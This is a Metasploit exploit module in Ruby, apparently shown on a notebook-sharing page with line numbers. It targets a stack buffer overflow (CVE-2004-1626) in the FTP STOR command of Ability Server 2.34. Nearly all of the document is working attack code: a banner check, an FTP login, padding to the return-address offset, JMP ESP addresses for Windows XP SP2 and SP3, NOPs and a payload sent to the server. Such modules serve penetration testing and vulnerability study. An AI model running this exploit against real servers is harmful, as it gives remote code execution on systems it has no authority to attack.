Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Ftp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Ability Server 2.34 STOR Command Stack Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a stack-based buffer overflow in Ability Server 2.34.
16
        Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,
17
        which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.
18

19
        The vulnerability has been confirmed on version 2.34 and has also been reported
20
        in version 2.25 and 2.32. Other versions may also be affected.
21
      },
22
      'Author'         =>
23
        [
24
          'muts',           #Initial discovery
25
          'Dark Eagle',     #same as muts
26
          'Peter Osterberg' #Metasploit
27
        ],
28
      'License'        => MSF_LICENSE,
29
      'References'     =>
30
        [
31
          [ 'CVE', '2004-1626' ],
32
          [ 'OSVDB', '11030'],
33
          [ 'EDB', '588'],
34
        ],
35
      'DefaultOptions' =>
36
        {
37
          'EXITFUNC' => 'process'
38
        },
39
      'Privileged'     => false,
40
      'Payload'        =>
41
        {
42
          'Space'    => 1000,
43
          'BadChars' => "\x00\xff"
44
        },
45
      'Platform'       => 'win',
46
      'Targets'        =>
47
        [
48
          [
49
            'Windows XP SP2 ENG',
50
            {
51
              #JMP ESP  (MFC42.dll. Addr remains unchanged until a patched SP3)
52
              'Ret' => 0x73E32ECF,
53
              'Offset' => 966
54
            }
55
          ],
56
          [
57
            'Windows XP SP3 ENG',
58
            {
59
              #JMP ESP  (USER32.dll. Unchanged unpatched SP3 - fully pathced)
60
              'Ret' => 0x7E429353,
61
              'Offset' => 966
62
            }
63
          ],
64
        ],
65
      'DisclosureDate' => '2004-10-22'
66
      ))
67

68
    register_options(
69
      [
70
        Opt::RPORT(21),
71
        OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ], fallbacks: ['USERNAME']),
72
        OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ], fallbacks: ['PASSWORD'])
73
      ])
74
    end
75

76
  def check
77
    connect
78
    disconnect
79
    if banner =~ /Ability Server 2\.34/
80
      return Exploit::CheckCode::Appears
81
    else
82
      if banner =~ /Ability Server/
83
        return Exploit::CheckCode::Detected
84
      end
85
    end
86
    return Exploit::CheckCode::Safe
87
  end
88

89
  def exploit
90
    c = connect_login
91
    return if not c
92

93
    myhost = datastore['LHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['LHOST']
94

95
    # Take client ip + ftp user lengths into account for EIP offset
96
    padd_size = target['Offset'] + (13 - myhost.length) + (3 - datastore['FTPUSER'].length)
97
    junk = rand_text_alpha(padd_size)
98

99
    sploit = junk
100
    sploit << [target.ret].pack('V')
101
    sploit << make_nops(32)
102
    sploit << payload.encoded
103
    sploit << rand_text_alpha(sploit.length)
104

105
    send_cmd(['STOR', sploit], false)
106
    handler
107
    disconnect
108
  end
109
end
110

111